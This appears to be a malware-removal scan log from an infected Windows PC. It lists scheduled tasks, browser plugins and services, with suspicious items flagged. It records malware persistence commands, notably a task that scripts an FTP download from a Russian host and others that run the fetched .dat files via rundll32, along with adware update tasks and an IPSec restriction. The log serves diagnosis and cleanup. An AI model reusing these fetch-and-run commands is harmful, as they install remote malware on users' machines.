/rawdata=CViQRH5mq6RiFfs1dwpjt+9N2qmNgqxn/gMF8uZA8OlW0vDxNi/tGrOocS7rwhXjEBo7yMbWzxrQxWDqNx8w5/JiPTO/sapwqscgUIsbIfPxhUuEnUO9ZJmQe7dlPw4isMUzCZtHUEfVrYB2MlvelKtXYZ0l5q5FtI2b3M2qZhC53dfQ9wgAYWB8aP2aq88oTYpNL35iY62bAyllIZV6UjdFHtcFjFPaHDhvPFM6QXclxCvmVE0nz8qEx2TVJN/UjkC7yF2rKmFjL95z9nxvBJlyLbos5kQPg3j0m/QL+1Dkzi/y/KXCgzozW314M6BM4BO7JeNj1CawWv4c03IACrJSWY0/CNj9A/gPNbviTEKOMk0KDxAuVE0YHrSpMHa9lIUw8gjn+JBRlEhQBrnsGQ0o5KplITgN6R0RmfnwzFLgQUtfPDvmsu3BFtASHo0uN7vr4UDpp8qWZPeqQLhKjwoA2dh5GVjeRkGEy5Yg8iek/3UpjcV+vuStKQGdPMItr1reSR5VcuSa9M6rPq+V1IJIy+hA+6KvdJULojj2//tHFd3FiCL9cfcsmQ6Przgl1zNJxrKBUONR0nf9vhWcXABXsWUeTY0Rz3FzUHhoT8BJeCyzxB4Hm6lVs8mjqSqaSBP6ATeHhDclskM+anK8p+zZGMZj3abu/izdOls6rWA/BvBCG1M772AdTz64rDJmncRWrvEJgsvd3Cnh9GLh2dfXb5/buRX/TZDo2CPOn2Iev3bz2yxaOzShl+Fh4DrHOJY8gwHfj0yTAgsVm3AuXwdC5BYoUrwhgZwQjUohYamPx/vaw0FTbcuUWfRbKGN7sOEUuzb5StkPpjZxWAZaKsDvcjDlWbeA58NklL/w64T30KnH/FqwbACtZe0ye+3jk0FZq1XLXs7H6dwOQiaiMj0sIj9yqTO4k9Wzy7jXeenk4KpjXpv0VbOcaThyNWdRaFnFGdy9YsVASfbi4ab29yDiUmQw2rZbIQweIDbNb6b9kuk/cG3ufu5xkLWZRww7U4VSDHQXYffDKvh5dLrt3xjnVVy+xfrEBHzJNqqlygKIdfV8oeulE840lJEjI0delxR50M8cjz90Lriq845m42EM5C45cHadT7qhMpNLiWNcIwRundiGTTDKFGId+N2IY+nIjk7lQ7uEsQJVzCMTglJmndM3Ie+rsjH+b6dM+36Ed7UloEUsIpBisxo+1CoWAIRhNqOfRXPs//fiRMYLMsHLxtzIOZrQJ4HsN/TFvVcYOBc6AxAmPeB6mFBHZDoSKCAWcRdZ13P8UdoK56FFRPtuTNms9UTCV7QfDulw3/FLprZtXIsE3NQ99fjth4kuDxMnlz9n3afcJ2fNppEKLw== (No File) <==== ATTENTION
Task: {2AE04DAF-5396-4938-9FFA-57DDBA863B88} - System32\Tasks\{8406D554-4EE5-437D-8CEA-C0DA8201F0C9} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Mysearchdial\1.8.29.0\uninstall.exe"
Task: {2B9F2E2D-2321-49DB-8AF7-F55BB2B85E2D} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe /DRMInit (No File)
Task: {2F33CB24-7A24-4BC8-8921-4C26EAB0708F} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe /logoncheck (No File)
Task: {319997A5-00B0-4E61-87B9-3CFCEFCFDD29} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} "C:\Program Files\Common Files\McAfee\Platform\McAMTaskAgent.exe" (No File)
Task: {34EA7168-77B4-42AD-86F8-706253868680} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe /DoActivateWindowsSearch (No File)
Task: {3F599EE8-6731-448E-AFDF-D262B64FBE6A} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (No File)
Task: {50444D44-CF78-417E-BB12-031C62D0EA29} - System32\Tasks\HP Photo Creations Communicator => C:\Users\Marilyn\AppData\Roaming\HP Photo Creations\Communicator.exe [186080 2011-11-15] (RocketLife -> )
Task: {50705818-630E-4136-BA82-0DB9119DA4AC} - System32\Tasks\Information-firefoxinstaller => C:\Program Files (x86)\Information\Information-firefoxinstaller.exe -> /installxpi /agentregpath='Information' /extensionfilepath='C:\Program Files (x86)\Information\50368.xpi' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=http://stats.srvstatsdata.com/errorsdomain=http://errors.srvstatsdata.com /waitforbrowser=300 /extensionid=ce85a36c-113a-4928-aa86-88a31bd595e7@aa144f8a-c1f6-481f-991c-18bf0472c970.com /extensionversion=0.93 /prefsbranch=ace85a36c113a4928aa8688a31bd595e7aa144f8ac1f6481f991c18bf0472c970com50368 /updateurl=https://w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/50368.rdf /extensionname='Information' /extensiondesc='Information Helper' /publishername='VisualBee' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='http://update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' <==== ATTENTION
Task: {53967A89-F06F-46F1-B3BA-D1A5E6FB8CBD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [7255608 2011-09-09] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {566C6850-EE65-4F4F-A90B-8795A8D39A5D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (No File)
Task: {5A2C50FB-9762-4877-81FD-634A43087C10} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe -PvrSchedule (No File)
Task: {5E809149-E296-4004-924E-26A5B98FB90B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe -ObjectStoreRecoveryTask (No File)
Task: {63ADE10D-554C-41D8-9026-2A84F03B8A8B} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe do-task "308046B0AF4A39CB"
Task: {68518EFB-4CCB-45A7-91E1-7615E98EB147} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe -pscn 0 (No File)
Task: {6C49D8F6-A561-478F-8562-B5B6C36B3542} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {6F747067-0D7D-4939-AC36-4658FB6094C9} - System32\Tasks\HPCustParticipation HP ENVY 7640 series => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe [5853704 2014-08-22] (Hewlett Packard -> Hewlett-Packard Development Company, LP)
Task: {7158081D-DF25-4E71-BC14-844441C6B587} - \MySearchDial -> No File <==== ATTENTION
Task: {72C186CA-1EC4-43EA-8773-FDF574197D62} - System32\Tasks\HPCeeScheduleForMarilyn => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [91704 2010-09-13] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {77B2A611-2A8B-4136-9E0A-B69F523C8EA1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe [34176 2012-12-17] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {7BDAAE08-C707-4305-9740-561B82F7FF91} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe /RestartRecording (No File)
Task: {81D43BF0-31FA-437A-A207-34FBD1EB4443} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe /DoReindexSearchRoot (No File)
Task: {8708676B-C4A6-408D-B706-4030F29488F9} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (No File)
Task: {8A502165-5679-46B2-83D6-881CC55ED923} - System32\Tasks\{F3E9CAEC-BBD5-4EE4-9A4A-BB27D26A356D} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Hewlett-Packard\SmartPrint\smartprintsetup.exe" -d C:\Users\Marilyn\Desktop
Task: {8D941E7F-F453-4838-AF1D-C0D25D4F3262} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (No File)
Task: {8EE9CB7F-6ABF-497B-80AB-E8EEB72B502C} - System32\Tasks\Information-updater => C:\Program Files (x86)\Information\Information-updater.exe /runupdater /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=http://stats.srvstatsdata.com/errorsdomain=http://errors.srvstatsdata.com /geoserviceurl=http://ipgeoapi.com/ /updatejsondomain=http://update.srvstatsdata.com /updaterversion=2 /monetizationdomain=http://stats.mstatsserv.com /autoupdateulr='http://update.srvstatsdata.com/updater_agent_updates/{CAMP_ID}/update.json' /runfrom='task' /externallog='' (No File) <==== ATTENTION
Task: {8FB062A9-BD13-42B5-B65F-B285C09B088E} - System32\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn) => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe /doScheduledScan (No File)
Task: {9EC65580-F30B-49AD-B23D-E6619DA3685B} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {A26E4F53-0C1D-47E6-93D4-2B1380751BD0} - \Mysa -> No File <==== ATTENTION
Task: {A4417F75-2B1A-43EF-B93B-A68027897A14} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe -SqlLiteRecoveryTask (No File)
Task: {A4A25E16-BC91-4ACE-9676-11A976F8163C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [7255608 2011-09-09] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {A9206F35-0D9A-40E5-95E7-8C15E7CEC916} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe -PvrRecoveryTask (No File)
Task: {ADC35D8D-8FD8-4112-A8AE-1873442EF63F} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [4158480 2016-12-15] (McAfee, Inc. -> McAfee, Inc.)
Task: {B4C24072-CB73-494D-A505-7A40E3341278} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe [7680 2022-03-28] () [File not signed] <==== ATTENTION
Task: {B6513C2B-1469-4BB6-9007-29A630203521} - System32\Tasks\HPCustPartic.exe_{BE46DC17-3C77-4163-8B22-E2A235CF8971} => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe [5853704 2014-08-22] (Hewlett Packard -> Hewlett-Packard Development Company, LP)
Task: {BCB60D00-1E83-4159-A3BA-5432DB9EA769} - System32\Tasks\RunAsStdUser Task => C:\Users\Marilyn\AppData\Local\Temp\{86D4B82A-ABED-442A-BE86-96357B70F4FE}\RunIE.exe -secondattempt http://sp.ask.com/to...er=IE&success=1(No File) <==== ATTENTION
Task: {C7EE3052-AD50-4721-9A35-2ED1ADF2BEA4} - \Mysa3 -> No File <==== ATTENTION
Task: {C8A0777B-EC92-4B1A-A2B9-ABFBC4AD5908} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (No File)
Task: {C9E3D7FF-0540-40E1-BD19-0D3BE6985F4E} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{36888087-FCC5-4335-9E96-ACA2D2A95DAE}.exe --uninstall=1 (No File) <==== ATTENTION
Task: {CEAF0A86-3EE6-4454-8C0D-CD971E6FEF8A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe [34176 2012-12-17] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {CF9A5C01-BEE9-4B79-A201-E0D630BE6804} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe /platui /runkey (No File)
Task: {D0CA8ECB-D919-4545-AF78-12493EE2D0DB} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-1250379553-2428740185-3603661230-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe /scheduledcheck (No File)
Task: {DB61A594-DCB9-421A-A376-D887F795D957} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe [1709568 2022-03-28] (www.google.com) [File not signed]
Task: {DC967769-6098-473C-8B18-8854081C98E1} - System32\Tasks\{F49F3141-310E-4D17-964E-8CBAEDD01415} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\DriverUpdate\UninstallStub.exe" -c --log {36488064-fdb3-451c-923b-fdd9d69c2554}
Task: {DE3295F5-6883-451F-8BD7-F00ACCB8E70C} - System32\Tasks\AVG EUpdate Task => C:\Program Files (x86)\AVG\Setup\avgsetupx.exe [3661072 2016-12-07] (AVG Technologies CZ, s.r.o. -> AVG Technologies CZ, s.r.o.)
Task: {DF5AF517-6345-4C01-9682-5D3B6468BCE8} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe -MediaCenterRecoveryTask (No File)
Task: {E374BBA4-EB46-4781-AF08-529748B61381} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe /StartRecording (No File)
Task: {E3E9FED2-6ED8-4C53-B7D7-8011E13B7949} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe RecoveryCDWin7 ShowMessageTask (No File)
Task: {EB21D51D-6372-4112-BA3A-8C465667B9D7} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (No File)
Task: {ED218DFE-D778-4991-AA1F-58CC4A678280} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (No File)
Task: {F094EA7D-B75A-434A-B205-0A3FF27DADDB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe [729656 2011-09-09] (Hewlett-Packard Company -> Hewlett-Packard Company)
Task: {F197CC66-BBE6-48B8-A8FC-73595165CA95} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe /OCURActivate (No File)
Task: {F7430C5F-32A2-44D7-8618-ACC01D88C2F0} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe -crl -hms -pscn 15 (No File)
Task: {F8C2130E-A883-46E4-81C7-3F4E090DA514} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe $(Arg0) (No File)
Task: {FE236B39-3A39-4715-B59E-00AAB070A19E} - System32\Tasks\{046A1759-6A62-4179-9ADF-004EE4E67228} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -c /AppMode=SETUP /Uninstall
Task: {FEEB404D-FF5E-4BA3-8E14-BFF9D5D072B1} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {FFBBEF2A-4D41-4919-8868-7066D68A860B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [684976 2022-03-10] (Piriform Software Ltd -> Piriform)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{36888087-FCC5-4335-9E96-ACA2D2A95DAE}.exe
Task: C:\Windows\Tasks\HP Photo Creations Communicator.job => C:\Users\Marilyn\AppData\Roaming\HP Photo Creations\Communicator.exe
Task: C:\Windows\Tasks\HPCeeScheduleForMarilyn.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\Windows\Tasks\Information-chromeinstaller.job => C:\Program Files (x86)\Information\Information-chromeinstaller.exe
Task: C:\Windows\Tasks\Information-codedownloader.job => C:\Program Files (x86)\Information\Information-codedownloader.exeɗ/reinstallapp /runfrom=task /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /codedownloaddomain=hxxp:/app-static.crossrider.com /defbro=ie /allusers /autoupdateulr='hxxp:/update.srvstatsdata.com/ie_code_agent_updates/{CAMP_ID}/update.jso
Task: C:\Windows\Tasks\Information-enabler.job => C:\Program Files (x86)\Information\Information-enabler.exeȡ/enablebho /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /bhoguid=11111111-1111-1111-1111-110511031168 /defbro=ie /allusers /autoupdateulr='hxxp:/update.srvstatsdata.com/ie_enable_agent_updates/{CAMP_ID}/update.jso
Task: C:\Windows\Tasks\Information-firefoxinstaller.job => C:\Program Files (x86)\Information\Information-firefoxinstaller.exeϧ/installxpi /agentregpath='Information' /extensionfilepath C:\Program Files (x86)\Information\50368.xpi' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installerfullversion=1.34.2.13 /installationtime=1395509351 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /waitforbrowser=300 /extensionid=ce85a36c-113a-4928-aa86-88a31bd595e7@aa144f8a-c1f6-481f-991c-18bf0472c970.com /extensionversion=0.93 /prefsbranch=ace85a36c113a4928aa8688a31bd595e7aa144f8ac1f6481f991c18bf0472c970com50368 /updateurl=hxxps:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/50368.rdf /extensionname='Information' /extensiondesc='Information Helper' /publishername='VisualBee' /defbro=ie /allusers /allprofiles /checkfflist /autoupdateulr='hxxp:/update.srvstatsdata.com/ff_agent_updates/{CAMP_ID}/update.jso
Task: C:\Windows\Tasks\Information-updater.job => C:\Program Files (x86)\Information\Information-updater.exeɴ/runupdater /agentregpath='Information' /appid=50368 /srcid='000972' /subid='verticals-shopping,intext,pops,ads,' /zdata='0' /bic=07DDEFF8A66544268EF5CBBA1DF83E80IE /verifier=2b16ecc477d558dd9a11ec235ae5ad0f /installerversion=1_34_2_13 /installationtime=1395509351 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hxxp:/update.srvstatsdata.com /updaterversion=2 /monetizationdomain=hxxp:/stats.mstatsserv.com /autoupdateulr='hxxp:/update.srvstatsdata.com/updater_agent_updates/{CAMP_ID}/update.jso
Task: C:\Windows\Tasks\MySearchDial.job => C:\Users\Marilyn\AppData\Roaming\MYSEAR~1\UPDATE~1\UPDATE~1.EXE
Task: C:\Windows\Tasks\SlimCleaner Plus (Scheduled Scan - Marilyn).job => C:\Program Files\SlimCleaner Plus\SlimCleanerPlus.exe
Task: C:\Windows\Tasks\Tweaking.com - Windows Repair Tray Icon.job => C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)\WR_Tray_Icon.exe C:\Program Files (x86)\Tweaking.com\Windows Repair (All in One)Tweaking.com - Windows Repair)Created By Tweaking.com
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
IPSecPolicy: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{f40293b7-4e08-4a64-904a-4c25ff731d56} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 172.16.103.1
Tcpip\..\Interfaces\{A9E69046-4B35-4ED2-BFB6-2CF003180388}: [DhcpNameServer] 172.16.103.1
Tcpip\..\Interfaces\{BC3C3E83-A47F-40E3-8DD5-864B4044E098}: [DhcpNameServer] 172.16.103.1
 
FireFox:
========
FF DefaultProfile: hsfkrlor.default
FF ProfilePath: C:\Users\Marilyn\AppData\Roaming\Mozilla\Firefox\Profiles\hsfkrlor.default [2022-03-24]
FF ProfilePath: C:\Users\Marilyn\AppData\Roaming\Mozilla\Firefox\Profiles\krham40v.default-release [2022-03-28]
FF Homepage: Mozilla\Firefox\Profiles\krham40v.default-release -> hxxps://www.google.com/?gws_rd=ssl
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (SmartPrintButton) - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [Legacy] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2017-01-27] [Legacy] [not signed]
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-12-21] (McAfee, Inc. -> )
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ei.TotalRecipeSearch_14.com/Plugin -> C:\Program Files (x86)\TotalRecipeSearch_14EI\Installr\1.bin\NP14EISB.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-12-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-12-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-12-18] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-12-21] (McAfee, Inc. -> )
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1250379553-2428740185-3603661230-1000: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\Users\Marilyn\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll [2011-11-15] (RocketLife -> RocketLife, LLP)
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
CHR HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AERTFilters; C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe [98208 2009-11-17] (Andrea Electronics -> Andrea Electronics Corporation)
S4 CinemaNow Service; C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemanowSvc.exe [140272 2010-05-21] (Sonic Solutions -> CinemaNow, Inc.)
S3 ClientAnalyticsService; C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe [1701840 2016-12-08] (McAfee, Inc. -> Intel Security)
S3 clr_optimization_v2.0.50727_64; C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [89920 2009-06-10] (Microsoft Corporation -> Microsoft Corporation)
S2 clr_optimization_v4.0.30319_64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [123856 2012-07-09] (Microsoft Dynamic Code Publisher -> Microsoft Corporation)
R2 Everything; C:\Program Files\Everything\Everything.exe [2240288 2019-02-04] (voidtools -> voidtools)
S4 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc. -> McAfee, Inc.)
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [7273144 2022-03-28] (Malwarebytes Inc -> Malwarebytes)
S4 McBootDelayStartSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc. -> McAfee, Inc.)
S4 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc. -> McAfee, Inc.)
S4 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc. -> McAfee, Inc.)
S4 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [1342904 2016-12-15] (McAfee, Inc. -> McAfee, Inc.)
S4 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc. -> McAfee, Inc.)
S4 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc. -> McAfee, Inc.)
S3 mfevtp; C:\Windows\system32\mfevtps.exe [342768 2016-11-14] (McAfee, Inc. -> McAfee, Inc.)
S4 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [641520 2016-12-09] (McAfee, Inc. -> McAfee, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2291568 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
S2 ehRecvr; %systemroot%\ehome\ehRecvr.exe [X]
S2 ehSched; %systemroot%\ehome\ehsched.exe [X]
S2 McAPExe; "C:\Program Files\Common Files\McAfee\VSCore_15_6\McApExe.exe" [X]
